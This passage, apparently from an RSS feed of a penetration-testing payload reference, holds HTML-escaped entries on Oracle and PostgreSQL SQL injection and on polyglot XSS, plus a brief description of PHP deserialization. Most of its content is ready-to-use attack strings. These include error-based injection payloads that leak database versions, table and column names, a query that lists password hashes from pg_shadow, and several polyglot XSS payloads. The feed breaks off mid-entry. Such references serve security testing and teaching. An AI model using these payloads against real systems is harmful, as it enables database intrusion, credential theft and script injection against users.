&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;column_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;all_tab_columns&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;blah&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;COLUMN_NAME&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;DATA_TYPE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SYS&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ALL_TAB_COLUMNS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;TABLE_NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;TABLE_NAME&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AND&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;OWNER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;DBNAME&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="oracle-sql-error-based" class="anchored-heading"&gt;Oracle SQL Error Based&lt;a class="heading-anchor" href="#oracle-sql-error-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th style="text-align: left"&gt;Description&lt;/th&gt;
 &lt;th style="text-align: left"&gt;Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;Invalid HTTP Request&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CTXSYS.DRITHSX.SN&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;Invalid XPath&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;Invalid XML&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;SELECT to_char(dbms_xmlgen.getxml('select &amp;quot;'&amp;amp;#124;&amp;amp;#124;(select user from sys.dual)&amp;amp;#124;&amp;amp;#124;'&amp;quot; FROM sys.dual')) FROM dual&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;Invalid XML&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;SELECT rtrim(extract(xmlagg(xmlelement(&amp;quot;s&amp;quot;, username &amp;amp;#124;&amp;amp;#124; ',')),'/s').getstringval(),',') FROM all_users&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;SQL Error&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;XDBURITYPE getblob&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;XDBURITYPE getclob&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;XMLType&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;AND 1337=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'~'||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))||'~'||CHR(62))) FROM DUAL) -- -&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;DBMS_UTILITY&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;code&gt;AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'||(SELECT banner FROM v$version)||'~') -- -&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;When the injection point is inside a string use : &lt;code&gt;'||PAYLOAD--&lt;/code&gt;&lt;/p&gt;</description></item><item><title>PHP Deserialization</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/php/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/php/</guid><description>&lt;blockquote&gt;
&lt;p&gt;PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.&lt;/p&gt;</description></item><item><title>Polyglot XSS</title><link>https://bokkapig.pages.dev/refs/payloads/xss-injection/2-xss-polyglot/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/xss-injection/2-xss-polyglot/</guid><description>&lt;p&gt;A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work across multiple contexts within a web application, such as HTML, JavaScript, and attributes. It exploits the application’s inability to properly sanitize input in different parsing scenarios.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Polyglot XSS - 0xsobky&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nx"&gt;jaVasCript&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="cm"&gt;/*-/*`/*\`/*&amp;#39;/*&amp;#34;/**/&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="cm"&gt;/* */&lt;/span&gt;&lt;span class="nx"&gt;oNcliCk&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nx"&gt;alert&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="c1"&gt;//%0D%0A%0D%0A//&amp;lt;/stYle/&amp;lt;/titLe/&amp;lt;/teXtarEa/&amp;lt;/scRipt/--!&amp;gt;\x3csVg/&amp;lt;sVg/oNloAd=alert()//&amp;gt;\x3e
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Polyglot XSS - Ashar Javed&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;&amp;gt;&amp;gt;&amp;lt;marquee&amp;gt;&amp;lt;img src=x onerror=confirm(1)&amp;gt;&amp;lt;/marquee&amp;gt;&amp;#34;&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/plaintext\&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;plaintext&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="nx"&gt;onmouseover&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nx"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;script&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="nx"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="err"&gt;/script&amp;gt;@gmail.com&amp;lt;isindex formaction=javascript:alert(/XSS/) type=submit&amp;gt;&amp;#39;--&amp;gt;&amp;#34; &amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;#34;&amp;gt;&amp;lt;img/id=&amp;#34;confirm&amp;amp;lpar; 1)&amp;#34;/alt=&amp;#34;/&amp;#34;src=&amp;#34;/refs/payloads/xss-injection/&amp;#34;onerror=eval(id&amp;amp;%23x29;&amp;gt;&amp;#39;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/http%3A%20/i.imgur.com/P8mL8.jpg&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Polyglot XSS - Mathias Karlsson&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="err"&gt;&amp;#34;&lt;/span&gt; &lt;span class="nx"&gt;onclick&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nx"&gt;alert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="c1"&gt;//&amp;lt;button ‘ onclick=alert(1)//&amp;gt; */ alert(1)//
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Polyglot XSS - Rsnake&lt;/p&gt;</description></item><item><title>PostgreSQL Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/postgresql-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/postgresql-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;PostgreSQL SQL injection refers to a type of security vulnerability where attackers exploit improperly sanitized user input to execute unauthorized SQL commands within a PostgreSQL database.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#postgresql-comments"&gt;PostgreSQL Comments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-enumeration"&gt;PostgreSQL Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-methodology"&gt;PostgreSQL Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-error-based"&gt;PostgreSQL Error Based&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#postgresql-xml-helpers"&gt;PostgreSQL XML Helpers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-blind"&gt;PostgreSQL Blind&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#postgresql-blind-with-substring-equivalent"&gt;PostgreSQL Blind With Substring Equivalent&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-time-based"&gt;PostgreSQL Time Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-out-of-band"&gt;PostgreSQL Out of Band&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-stacked-query"&gt;PostgreSQL Stacked Query&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-file-manipulation"&gt;PostgreSQL File Manipulation&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#postgresql-file-read"&gt;PostgreSQL File Read&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-file-write"&gt;PostgreSQL File Write&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-command-execution"&gt;PostgreSQL Command Execution&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#using-copy-tofrom-program"&gt;Using COPY TO/FROM PROGRAM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#using-libcso6"&gt;Using libc.so.6&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-waf-bypass"&gt;PostgreSQL WAF Bypass&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#alternative-to-quotes"&gt;Alternative to Quotes&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-privileges"&gt;PostgreSQL Privileges&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#postgresql-list-privileges"&gt;PostgreSQL List Privileges&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#postgresql-superuser-role"&gt;PostgreSQL Superuser Role&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="postgresql-comments" class="anchored-heading"&gt;PostgreSQL Comments&lt;a class="heading-anchor" href="#postgresql-comments" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Type&lt;/th&gt;
 &lt;th&gt;Comment&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Single-Line Comment&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;--&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Multi-Line Comment&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;/**/&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="postgresql-enumeration" class="anchored-heading"&gt;PostgreSQL Enumeration&lt;a class="heading-anchor" href="#postgresql-enumeration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT version()&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Database Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT CURRENT_DATABASE()&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Database Schema&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT CURRENT_SCHEMA()&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List PostgreSQL Users&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT usename FROM pg_user&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List Password Hashes&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT usename, passwd FROM pg_shadow&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List DB Administrators&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT usename FROM pg_user WHERE usesuper IS TRUE&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current User&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT user;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current User&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT current_user;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current User&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT session_user;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current User&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT usename FROM pg_user;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current User&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT getpgusername();&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="postgresql-methodology" class="anchored-heading"&gt;PostgreSQL Methodology&lt;a class="heading-anchor" href="#postgresql-methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;List Schemas&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT DISTINCT(schemaname) FROM pg_tables&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List Databases&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT datname FROM pg_database&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List Tables&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT table_name FROM information_schema.tables&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List Tables&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT table_name FROM information_schema.tables WHERE table_schema='&amp;lt;SCHEMA_NAME&amp;gt;'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List Tables&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT tablename FROM pg_tables WHERE schemaname = '&amp;lt;SCHEMA_NAME&amp;gt;'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List Columns&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT column_name FROM information_schema.columns WHERE table_name='data_table'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="postgresql-error-based" class="anchored-heading"&gt;PostgreSQL Error Based&lt;a class="heading-anchor" href="#postgresql-error-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Name&lt;/th&gt;
 &lt;th&gt;Payload&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;CAST&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;AND 1337=CAST('~'||(SELECT version())::text||'~' AS NUMERIC) -- -&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;CAST&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;AND (CAST('~'||(SELECT version())::text||'~' AS NUMERIC)) -- -&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;CAST&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;AND CAST((SELECT version()) AS INT)=1337 -- -&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;CAST&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;AND (SELECT version())::int=1 -- -&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;CAST&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="k"&gt;VERSION&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;CAST&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;information_schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tables&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIMIT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;offset&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;data_offset&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="c1"&gt;--
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;CAST&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;column_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;information_schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;columns&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;data_table&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIMIT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;OFFSET&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;data_offset&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="n"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="c1"&gt;--
